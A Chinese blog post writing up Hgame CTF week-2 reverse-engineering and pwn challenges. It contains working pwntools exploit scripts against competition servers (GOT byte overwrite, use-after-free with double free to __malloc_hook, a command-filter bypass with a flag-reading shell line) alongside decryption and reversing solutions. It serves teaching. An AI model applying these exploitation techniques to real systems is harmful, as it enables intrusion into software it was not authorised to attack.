记一次春节CTF实战练习(RE/PWN)

于 2020-02-07 09:30:00 发布
阅读量1k 收藏 2
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38154820/article/details/106330207
版权

这是Hgame_CTF第二周的题目,一共有四周。相对来说,比第一周难(HgameCTF(week1)-RE,PWN题解析)。这次的有一道逆向考点也挺有意思,得深入了解AES的CBC加密模式才能解题。还有一道pwn虽然能getshell,但是程序关闭了回显,并不能获取flag。队友提供了一种比较骚的思路才解开。

##pwn

###Another_Heaven

该题目存在一个后门

  *(_DWORD *)v5 = readi();  // 可以写入一个地址
  read(0, (void *)*(signed int *)v5, 1uLL);

这两行代码意思是 可以自己输入一个地址,然后可以改变该地址里边的一个数值。另外没有发现其他的漏洞。

再看cspw函数

__int64 cpswd()
{
  int i; // [rsp+Ch] [rbp-14h]


  puts("Input new password:");
  read_n((__int64)buf, 48);
  printf("Processing.", 48LL);
  for ( i = 0; i < strlen(buf); ++i )
  {
if ( !strncpy((char *)(i + 0x602160LL), &buf[i], 1uLL) )// 覆盖到flag
{
  puts("System Error!");
  exit(0);
}
putchar('.');
usleep(10000u);
  }
  puts("Done!");
  return 0LL;
}

可以覆盖flag,那么strncpy第一个参数就是读取的flag,其实strncpy和puts函数地址只相差了一位,那么可以通过改变这一位来使得strncpy变成puts函数输出flag。

#!/usr/bin/python
#coding:utf-8
from pwn import *
from time import *
from LibcSearcher import *


context.log_level="debug"


REMOTE_LIBC = "./db/libc6_2.24-9ubuntu2.2_amd64.so"

io = remote('172.17.0.2',10001)
#elf = ELF(EXEC_FILE)
#libc = ELF(REMOTE_LIBC)


io.recv()
raw_input()
io.sendline(str(0x0602020))#修改strncpy
io.send('\xE6')


io.recvuntil(':')
io.sendline("E99p1ant")


io.recvuntil(":")
io.sendline('a')


io.recvuntil('(y/n)')
io.sendline('y')


io.recvuntil('?')
io.sendline('Alice·Synthesis·Thirty')


io.recvuntil(":")
io.sendline('a')


print io.recv()
io.interactive()

###Roc826s_Note

题目没有edit函数,但是delete函数存在uaf漏洞,给了libc,可以先释放unsorted bin求出libc基地址,然后通过double free来修改malloc hook跳转到one_gadget。

#!/usr/bin/python
#coding:utf-8
from pwn import *
from time import *
from LibcSearcher import *


context.log_level="debug"


#EXEC_FILE = "./ROP_LEV"
REMOTE_LIBC = "./libc-2.23.so"


#main_offset = 3951392
io = remote('47.103.214.163',21002)
#io = process('./Roc826')
#elf = ELF(EXEC_FILE)
libc = ELF(REMOTE_LIBC)

def add(size,content):
  io.sendlineafter(':','1')
  io.sendlineafter('?',str(size))
  io.sendlineafter(':',content)

def show(idx):
  io.sendlineafter(':','3')
  io.sendlineafter('?',str(idx))


def delete(idx):
  io.sendlineafter(':','2')
  io.sendlineafter('?',str(idx))

add(0x89,'a')#0
add(0x10,'b')#1


delete(0)


show(0)
io.recvuntil('content:')
unsorted_bin = u64(io.recvn(6).ljust(8,'\x00')) - 88
print hex(unsorted_bin)
libc_addr = unsorted_bin - 3951392


print hex(libc_addr)


__malloc_hook = libc_addr + libc.sym['__malloc_hook']


add(0x68,'c')#2
add(0x68,'d')#3
add(0x68,'e')#4


delete(2)
delete(3)
delete(2)


add(0x68,p64(__malloc_hook-35)*2)#5
add(0x68,'f')#6


add(0x68,'g')
add(0x68,19*'\x00'+p64(libc_addr+0xf1147))


io.sendlineafter(':','1')
io.sendlineafter('?',str(0x68))

io.interactive()

###findyourself

题目考察过滤,有两个check函数,如果通过check函数就会执行system

signed __int64 __fastcall check1(const char *a1)
{
  signed __int64 result; // rax
  int i; // [rsp+1Ch] [rbp-14h]


  for ( i = 0; i < strlen(a1); ++i )
  {
if ( (a1[i] <= 96 || a1[i] > 122) && (a1[i] <= 64 || a1[i] > 90) && a1[i] != 47 && a1[i] != 32 && a1[i] != 45 )
  return 0xFFFFFFFFLL;
  }
  if ( strstr(a1, "sh") || strstr(a1, "cat") || strstr(a1, "flag") || strstr(a1, "pwd") || strstr(a1, "export") )
result = 0xFFFFFFFFLL;
  else
result = 0LL;
  return result;
}


signed __int64 __fastcall check2(const char *a1)
{
  signed __int64 result; // rax


  if ( strchr(a1, 42)
|| strstr(a1, "sh")
|| strstr(a1, "cat")
|| strstr(a1, "..")
|| strchr(a1, 38)
|| strchr(a1, 124)
|| strchr(a1, 62)
|| strchr(a1, 60) )
  {
result = 0xFFFFFFFFLL;
  }
  else
  {
result = 0LL;
  }
  return result;
}

原本是绕过了第一个check,想通过第二个check得到终端。exp如下

#!/usr/bin/python
#coding:utf-8
from pwn import *
from time import *
from LibcSearcher import *


context.log_level="debug"


#EXEC_FILE = "./ROP_LEV"
REMOTE_LIBC = "./db/libc6_2.24-9ubuntu2.2_amd64.so"

io = remote('47.103.214.163',21000)
#elf = ELF(EXEC_FILE)
#libc = ELF(REMOTE_LIBC)


io.recvuntil('yourself')
io.sendline('ls -l /proc/self/cwd')


sleep(0.1)


io.recvuntil('-> ')
chdir = io.recvn(15)
io.recv()
io.sendline(chdir)
sleep(0.1)
raw_input()
io.sendline('ltotal 4004')


io.interactive()

但是该题目在执行第二个system之前close(1),所以没有回显。后来队内的师傅想到了把 flag 里面的内容当成新建文件的名字然后就能"ls -l"读出来。getshell之后虽然没有回显,但是输入命令可以执行。先执行

cat /flag>/tmp/`cat /flag`

使用flag当作文件名创建一个文件。然后ls -l /tmp输出flag

##RE

###unpack

题目加有类似upx的壳,或许用esp定律可以脱,但是是elf程序,最后凭经验追到OEP。

追到下边代码的时候就能感觉到已经进入OEP了    

LOAD:0000000000400890 loc_400890:
LOAD:0000000000400890 xor ebp, ebp
LOAD:0000000000400892 mov r9, rdx
LOAD:0000000000400895 pop rsi
LOAD:0000000000400896 mov rdx, rsp
LOAD:0000000000400899 and rsp, 0FFFFFFFFFFFFFFF0h
LOAD:000000000040089D push rax
LOAD:000000000040089E push rsp
LOAD:000000000040089F mov r8, 4017A0h
LOAD:00000000004008A6 mov rcx, 401710h
LOAD:00000000004008AD mov rdi, offset sub_4009AE
LOAD:00000000004008B4 call loc_401250
LOAD:00000000004008B9 hlt

很容易就能看到flag处理函数    

__int64 sub_4009AE()
{
  __int64 result; // rax
  signed int v1; // [rsp+8h] [rbp-48h]
  signed int i; // [rsp+Ch] [rbp-44h]
  char v3[56]; // [rsp+10h] [rbp-40h]
  unsigned __int64 v4; // [rsp+48h] [rbp-8h]


  v4 = __readfsqword(0x28u);
  sub_40F570((__int64)&unk_4A13A8, v3);
  v1 = 0;
  for ( i = 0; i <= 41; ++i )
  {
if ( i + v3[i] != (unsigned __int8)unk_6CA0A0[i] )
  v1 = 1;
  }
  if ( v1 == 1 )
sub_40FE40(&unk_4A13AD, v3);
  else
sub_40FE40(&unk_4A13C0, v3);
  result = 0LL;
  if ( __readfsqword(0x28u) != v4 )
sub_443040();
  return result;
}

exp

q = "6868637069805B7578496D76757B756E4184716544824A858C827D7A824D907E92549888969857958FA6"


flag = []


for i in range(0,len(q),2):
  flag.append(int(q[i:i+2],16))


flags = ""


for i in range(len(flag)):
  flags+=chr(flag[i]-i)
print flags

###bbbbbb

该题目挺有意思的,首先输入flag。

  do
  {
LOBYTE(v64) = '_';
v66 = sub_7FF6A2974B70(&v96, v64, 0i64);
sub_7FF6A2974D90(&v96, &v97, 0i64, v66);
sub_7FF6A2974AE0(&v96, 0i64, v66 + 1);
v67 = (const char *)sub_7FF6A2974A10(&v97);
*((_DWORD *)&v90 + v65) = atoi(v67);
sub_7FF6A2974150(&v97);
++v65;
  }
  while ( v65 < 4 );

上边代码的意思是按下划线切割flag,分割成四个数字。也就是说,输入flag格式为aaa bbb ccc ddd

然后经过

v68 = GetCurrentProcess();
  v69 = GetModuleHandleW(0i64);
  *(_OWORD *)modinfo = 0ui64;
  *(_QWORD *)&modinfo[16] = 0i64;
  K32GetModuleInformation(v68, v69, (LPMODULEINFO)modinfo, 0x18u);
  v92 = 0ui64;  // 并没有覆盖到
  v93 = 0ui64;
  v94 = 0;
  sub_7FF6A2971010(&sha_init);
  v70 = (char *)(*(_QWORD *)modinfo + 0x1000i64);
  if ( *(_QWORD *)modinfo + 0x1000i64 < (unsigned __int64)(*(_QWORD *)modinfo + 20480i64) )
  {
do
{
  sub_7FF6A2971090((__int64)&sha_init, v70, 0x1000ui64);
  memset(&Dst, 0, 1232ui64);
  v102 = 0x100010;
  v71 = GetCurrentThread();
  GetThreadContext(v71, (LPCONTEXT)&Dst);
  sub_7FF6A2971090((__int64)&sha_init, &v103, 0x20ui64);
  v70 += 0x1000;
}
while ( (unsigned __int64)v70 < *(_QWORD *)modinfo + 0x5000i64 );
  }
  sub_7FF6A29711C0(&v92, &sha_init);
  v72 = _mm_xor_si128(_mm_loadu_si128((const __m128i *)&v92), _mm_loadu_si128((const __m128i *)&v93));
  _mm_storeu_si128((__m128i *)&v92, v72);

先看sub_7FF6A2971010函数,里边初始化赋值,明显是sha类的哈希函数。

signed __int64 __fastcall sub_7FF6A2971010(__int64 a1)
{
  signed __int64 result; // rax


  *(_QWORD *)(a1 + 32) = 0i64;
  *(_QWORD *)(a1 + 40) = 0i64;
  *(_QWORD *)(a1 + 48) = 0i64;
  *(_QWORD *)(a1 + 56) = 0i64;
  *(_QWORD *)(a1 + 64) = 0i64;
  *(_QWORD *)(a1 + 72) = 0i64;
  *(_QWORD *)(a1 + 80) = 0i64;
  *(_QWORD *)(a1 + 88) = 0i64;
  *(_QWORD *)(a1 + 96) = 0i64;
  *(_DWORD *)(a1 + 104) = 0;
  result = 1i64;
  *(_DWORD *)a1 = 1779033703;
  *(_DWORD *)(a1 + 4) = -1150833019;
  *(_DWORD *)(a1 + 8) = 1013904242;
  *(_DWORD *)(a1 + 12) = -1521486534;
  *(_DWORD *)(a1 + 16) = 1359893119;
  *(_DWORD *)(a1 + 20) = -1694144372;
  *(_DWORD *)(a1 + 24) = 528734635;
  *(_DWORD *)(a1 + 28) = 1541459225;
  *(_DWORD *)(a1 + 108) = 32;
  return result;
}

然后通过K32GetModuleInformation函数获取到模块信息进行加密,也就是获取地址为0x7FF6A2971000-0x7FF6A2975000之间的数据进行加密,每次获取0x1000个字节,这里边刚好包含了主要函数。这个主要用于反调试,防止别人修改代码和下普通断点,其实尝试着在这之间下不同断点会发现每次得到的哈希值都不一样。然后通过GetThreadContext函数获取线程上下文,得到的数据进行加密,印象中这个函数可以用于防止下硬件断点。在这种情况下,我们可以在exit函数下断点,因为exit函数位于加密地址之外,不会影响正确的哈希值,主要捕捉到里边生成的正确的哈希值就行。

然后通过CE来扫描数据,调试发现,正确的哈希值位于我们输入的flag下一行。比如我们输入

123_456_789_111

那我们可以搜索 7B 00 00 00 C8 01 00 00 15 03 00 00 6F 00 00 00 通过CE搜索可以得到哈希值

那么可以得到0x932877ad 0x4da107ea 0xc767e46b 0x5a857214,还要注意程序使用atoi转换的数字,0x932877ad和0xc767e46b输入之后会变成负数,这个得注意一下。最后输入    

1302398954_-1826064467_1518694932_-949492629

得到flag:

 hgame{1302398954_2468902829_1518694932_3345474667}

###babyPy

题目直接给出pyc的opcode

In [1]: from secret import flag, encrypt


In [2]: encrypt(flag)
Out[2]: '7d037d045717722d62114e6a5b044f2c184c3f44214c2d4a22'


In [3]: import dis


In [4]: dis.dis(encrypt)
  4   0 LOAD_FAST0 (OOo)
  2 LOAD_CONST   0 (None)
  4 LOAD_CONST   0 (None)
  6 LOAD_CONST   1 (-1)
  8 BUILD_SLICE  3
 10 BINARY_SUBSCR
 12 STORE_FAST   1 (O0O)


  5  14 LOAD_GLOBAL  0 (list)
 16 LOAD_FAST1 (O0O)
 18 CALL_FUNCTION1
 20 STORE_FAST   2 (O0o)


  6  22 SETUP_LOOP  50 (to 74)
 24 LOAD_GLOBAL  1 (range)
 26 LOAD_CONST   2 (1)
 28 LOAD_GLOBAL  2 (len)
 30 LOAD_FAST2 (O0o)
 32 CALL_FUNCTION1
 34 CALL_FUNCTION2
 36 GET_ITER
>>   38 FOR_ITER32 (to 72)
 40 STORE_FAST   3 (O0)


  7  42 LOAD_FAST2 (O0o)
 44 LOAD_FAST3 (O0)
 46 LOAD_CONST   2 (1)
 48 BINARY_SUBTRACT
 50 BINARY_SUBSCR
 52 LOAD_FAST2 (O0o)
 54 LOAD_FAST3 (O0)
 56 BINARY_SUBSCR
 58 BINARY_XOR
 60 STORE_FAST   4 (Oo)


  8  62 LOAD_FAST4 (Oo)
 64 LOAD_FAST2 (O0o)
 66 LOAD_FAST3 (O0)
 68 STORE_SUBSCR
 70 JUMP_ABSOLUTE   38
>>   72 POP_BLOCK


  9 >>   74 LOAD_GLOBAL  3 (bytes)
 76 LOAD_FAST2 (O0o)
 78 CALL_FUNCTION1
 80 STORE_FAST   5 (O)


 10  82 LOAD_FAST5 (O)
 84 LOAD_METHOD  4 (hex)
 86 CALL_METHOD  0
 88 RETURN_VALUE


In [5]: exit()

需要注意

BINARY_SUBTRACT 为相减,BINARY_SUBSCR 取值

可以还原

flag = "sfesefsfhthfyhjjus"
O0o = list(flag)
out_flag = ""
for i in range(1,len(O0o)):
	O0 = i
	Oo = ord(O0o[O0-1])^ord(O0o[O0])
	O0o [O0] = Oo

写出exp

q = "7d037d045717722d62114e6a5b044f2c184c3f44214c2d4a22"
flag = []
for i in range(0,len(q),2):
  flag.append(int(q[i:i+2],16))
print flag
flags = ""


flag = flag[::-1]
for i in range(len(flag)-1):
  flag[i] = flag[i+1]^flag[i]
  flags += chr(flag[i])
flags += chr(0x7d)
print flags

###classic_CrackMe

.net程序

string text = this.textBox1.Text;
      if (text.Length != 46 || text.IndexOf("hgame{") != 0 || text.IndexOf("}") != 45)
      {
        MessageBox.Show("Illegal format");
        return;
      }
      string base64iv = text.Substring(6, 24);
      string str = text.Substring(30, 15);
      try
      {
        Aes aes3 = new Aes("SGc0bTNfMm8yMF9XZWVLMg==", base64iv);
        Aes aes2 = new Aes("SGc0bTNfMm8yMF9XZWVLMg==", "MFB1T2g5SWxYMDU0SWN0cw==");
        string text2 = aes3.DecryptFromBase64String("mjdRqH4d1O8nbUYJk+wVu3AeE7ZtE9rtT/8BA8J897I==");
        if (text2.Equals("Same_ciphertext_"))
        {
          byte[] array = new byte[16];
          Array.Copy(aes2.EncryptToByte(text2 + str), 16, array, 0, 16);
          if (Convert.ToBase64String(array).Equals("dJntSWSPWbWocAq4yjBP5Q=="))
          {
            MessageBox.Show("注册成功!");
            this.Text = "已激活,欢迎使用!";
            this.status = 1;
          }
          else
          {
            MessageBox.Show("注册失败!\nhint: " + aes2.DecryptFromBase64String("mjdRqH4d1O8nbUYJk+wVu3AeE7ZtE9rtT/8BA8J897I="));
          }
        }
        else
        {
          MessageBox.Show("注册失败!\nhint: " + aes2.DecryptFromBase64String("mjdRqH4d1O8nbUYJk+wVu3AeE7ZtE9rtT/8BA8J897I="));
        }
      }
      catch
      {
        MessageBox.Show("注册失败!");
      }
    }

输入的flag分成两部分,前部分当成iv。用已知的iv('MFB1T2g5SWxYMDU0SWN0cw==')去解密的话会得到Learn principles,不符合要求,显然这是要学习原理,求出iv。

明文,密文,密钥,我们都知道,不同的iv得到的不同明文我们也知道。通过原理可知 IV 和 DecChiperText 和 plainText 是 xor 关系。

解密时:用 key 去解密 chiperText 再和 IV 异或就能得到 plainText

plainText = ( Decrypt(chiperText, key) ) ^ IV

上面的公式 分成两步:

1.DecChiperText = Decrypt(chiperText, key)   //使用 key 去解密 chiperText

2.plainText = tmp ^ IV  //这样的话, 就算 iv 是错的 也不会影响到 Decrypt(chiperText, key)

已知:

key = "Hg4m3_2o20_WeeK2"
plainText = "Same_ciphertext_"
chiperText = "\x9a7Q\xa8~\x1d\xd4\xef'mF\t\x93\xec\x15\xbbp\x1e\x13\xb6m\x13\xda\xedO\xff\x01\x03\xc2|\xf7\xb2"

再构造一个 假 IV 去解密,变成:

fakeIV = "aaaaaaaaaaaaaaaa"
key = "Hg4m3_2o20_WeeK2"
plainText = "Same_ciphertext_"
chiperText = "\x9a7Q\xa8~\x1d\xd4\xef'mF\t\x93\xec\x15\xbbp\x1e\x13\xb6m\x13\xda\xedO\xff\x01\x03\xc2|\xf7\xb2"


fakePlainText = ( Decrypt(chiperText, key) ) ^ fakeIV
plainText = fakePlainText ^ fakeIV

因为得到的结果 fakePlainText 是异或过 fakeIV 的,我们只要 再次异或 fakeIV 就能得到公式上面第一步得到的结果 DecChiperText。DecChiperText 和 IV 和 plainText 是 xor 关系现在已知 DecChiperText 和 plainText 就能求出 真正的 IV    

IV = DecChiperText ^  plainText

可以写python代码    

from Crypto.Cipher import AES
import base64


key = base64.b64decode("SGc0bTNfMm8yMF9XZWVLMg==")
fakeIV = "aaaaaaaaaaaaaaaa"
plainText = "Same_ciphertext_"
chiperText = base64.b64decode("mjdRqH4d1O8nbUYJk+wVu3AeE7ZtE9rtT/8BA8J897I=")
mode = AES.MODE_CBC
aesCipher = AES.new(key, mode, fakeIV)


fakePlainText = aesCipher.decrypt(chiperText)


#print fakePlainText


IV = ''
for i in range(16):
  IV += chr(ord(fakePlainText[i]) ^ ord(fakeIV[i]) ^ ord(plainText[i]))
print "IV : " + IV


#IV : /TyXYzPnY;$)\we_

求得IV为/TyXYzPnY;$)\we_ 经过base64加密后为L1R5WFl6UG5ZOyQpXHdlXw==

然后使用text2和后半部分flag拼接加密,加密后的密文最后24位必须为"dJntSWSPWbWocAq4yjBP5Q=="。text2位16位,刚好填充满,通过原理可知,密文前面16位不变。那么可以先让text2单独加密,得到密文的16进制,然后同"dJntSWSPWbWocAq4yjBP5Q=="的16进制形式拼接在一起,经过base64加密,得到密文"xlKKQA5RPpyyA1YBjDeL5HSZ7Ulkj1m1qHAKuMowT+U"。直接解密得到后半flag。

(完)


如果想更多系统的学习CTF,可点击文末“阅读原文”,进入CTF实验室学习,里面涵盖了6个题目类型系统的学习路径和实操环境。

春节CTF实战之HgameCTF(week1)-RE,PWN题解析

想学习CTF的一定要看这篇,让你学习效率提升80%

疫情之下,教师如何进行远程网安实践教学?来看看这个!

点击获取:2019原创干货集锦 | 掌握学习主动权

大家有好的技术原创文章

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦

有才能的你快来投稿吧!

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!

戳“阅读原文”进入CTF实验室!

蚁景网安实验室
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
博客
在一次渗透中学会编写Tamper脚本
05-21 306
拿到这个网站,通过对比查询,我们发现...闭合参数 finsh 时,查询出的内容更多,经过进一步判断,确实存在漏洞。不过在测试的时候发现存在一定的过滤,但是可以通过内联注释进行绕过。
博客
记一次有点抽象的渗透经历
05-17 740
在各种信息搜集中,发现某个ip的端口挂着一个比较老的服务。首先看到了员工工号和手机号的双重验证,也不知道账号是什么结构组成的,基本上放弃字典爆破这一条路。于是乎打开之前用灯塔的扫描结果,看看文件泄露是否有什么可用的点。
博客
Netgear无线路由器漏洞复现(CVE-2019-20760)
05-14 411
本文复现的漏洞为Netgear路由器远程命令执行漏洞,1.0.4.26之前的NETGEAR R9000设备会受到身份验证绕过的影响,可利用漏洞将木马程序下载下来,获取 shell。
博客
记一次特别的未授权访问
05-13 339
某个夜里,随手点进去的一个小程序,引发的连锁反应。开局一个小程序,登录方式令人发愁,尝试收集,无果;数据交互的地方说不定有sql,再次尝试,还是无果;复制链接去web端,看看有没有什么收获。
博客
记一些CISP-PTE题目解析
05-11 853
本文CISP-PTE题目解析包括:基础题目的命令执行、文件上传突破、流量分析、代码审计、SQL注入、无回显命令执行,以及二阶SQL注入等。
博客
CVE复现之老洞新探(CVE-2021-3156)
05-08 694
这个老洞新探,还是挺有意思的, 从源码分析到动态调试,整个过程对程序调试的能力有很大的锻炼。在这个洞的利用中,思路是比较清晰的,但在堆排布那里,由于中间会有很多其他的堆块操作是我们不可控,就会存在较大困难,要么通过逆向分析梳理所有的堆块操作然后手动构造,要么就是通过fuzz。
博客
ChatGPT-Next-Web漏洞利用分析(CVE-2023-49785)
05-07 593
日常网上冲浪,突然粗看以为是有关Chat-GPT的CVE披露出来了,但是仔细一看原来是ChatGPT-Next-Web的漏洞。NextChat,也称为 ChatGPT-Next-Web,是与 ChatGPT 一起使用的跨平台聊天用户界面。 2.11.2 及之前的版本容易受到服务器端请求伪造和跨站点脚本攻击的影响。2024年3月,互联网上披露CVE-2023-49785,攻击者可在无需登陆的情况下构造恶意请求造成SSRF,造成敏感信息泄漏等。
博客
Nftables漏洞原理分析(CVE-2022-32250)
05-06 967
在nftales中存在着集合(sets),用于存储唯一值的集合。sets 提供了高效地检查一个元素是否存在于集合中的机制,它可以用于各种网络过滤和转发规则。而CVE-2022-32250漏洞则是由于nftables在处理set时存在uaf的漏洞。
博客
记一次北京某大学逻辑漏洞挖掘
04-28 215
个人觉得教育src的漏洞挖掘就不需要找真实IP了,我们直接进入正题,收集某大学的子域名,可以用oneforall,主要是子域名直接就可以复制到txt文件,方便后续域名探针。这里查询到700多个子域名。
博客
Netfilter漏洞提权利用(CVE-2023-35001)
04-25 917
Netfilter是一个用于Linux操作系统的网络数据包过滤框架,它提供了一种灵活的方式来管理网络数据包的流动。Netfilter允许系统管理员和开发人员控制数据包在Linux内核中的处理方式,以实现网络安全、网络地址转换(Network Address Translation,NAT)、数据包过滤等功能。
博客
一次奇妙的任意用户登录实战
04-22 384
刚刚进行了微信sessionkey的学习,正准备实战一下,就发现了这个神奇的网站,预知后事如何,请继续向下看去。
博客
CTF中常见的四种python逆向
04-18 1144
pyc是一种二进制文件,是由py文件经过编译后,生成的文件,是一种byte code,py文件变成pyc文件后,加载的速度有所提高,pyc 文件是 Python 编译过的字节码文件。它是 Python 程序在运行过程中由源代码(通常是 .py 文件)自动或手动编译产生的二进制文件。
博客
记一次奇妙的某个edu渗透测试
04-16 271
对登录方法的轻视造成一系列的漏洞出现,对接口确实鉴权造成大量的信息泄露。从小程序到web端网址的奇妙的测试就此开始。
博客
记一次对某高校微信小程序的漏洞挖掘
04-15 346
挖掘目标部署在微信的资产,减少信息的收集,毕竟一般web站点没有账号密码不好进入后台,挖掘功能点少。
博客
从CVE复现看栈溢出漏洞利用
04-12 964
最近复现了两个栈溢出漏洞的cve,分别是CVE-2017-9430和CVE-2017-13089,简单记录一下real wrold中的栈溢出漏洞学习。目前,栈溢出漏洞主要出现在iot固件中,linux下的已经很少了,所以这两个洞都是17年,比较早,但还是能学到一些东西。
博客
KASLR绕过及提权利用(CVE-2023-35001)
04-11 699
关于KASLR绕过,可以利用byteorder操作加上netlink组订阅可以泄露rule中的handle字段,该方法应该是可以用来泄露kernel基地址的,但是作者还提出另一种方法进行泄露,应该是为了提权利用做铺垫。
博客
关于转义符 \ 在php正则中的匹配问题
04-09 1128
这道题在网上的wp基本都是直接用`\`去执行命令,但很少有人能去讨论为什么可以这么绕过,后端代码已经做出了过滤,为什么还是会被绕过,我很幸运能够看到更深的分析。
博客
中间件漏洞攻防学习总结
04-09 940
Apache(阿帕奇)是世界使用排名第一的Web服务器软件。它可以运行在几乎所有广泛使用的计算机平台上,由于其跨平台和安全性被广泛使用,是最流行的Web服务器端软件之一。 此漏洞的出现是由于 apache 在修复第一个后缀名解析漏洞时,用正则来匹配后缀。在解析 php 时 xxx.php\x0A 将被按照 php 后缀进行解析,导致绕过一些服务器的安全策略。
博客
甲方安全建设之研发安全-SCA
04-08 937
大多数企业或多或少的会去采购第三方软件,或者研发同学在开发代码时,可能会去使用一些好用的软件包或者依赖包,但是如果这些包中存在恶意代码,又或者在安装包时不小心打错了字母安装了错误的软件包,则可能出现供应链攻击。
博客
甲方安全建设之日志采集实操干货
04-07 964
没有永远的安全,如何在被攻击的情况下,快速响应和快速溯源分析攻击动作是个重要的话题。想要分析攻击者做了什么、怎么攻击进来的、还攻击了谁,那么日志是必不可少的一项,因此我们需要尽可能采集多的日志来进行分析攻击者的动作,甚至在攻击者刚落脚的时候就阻断攻击者。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值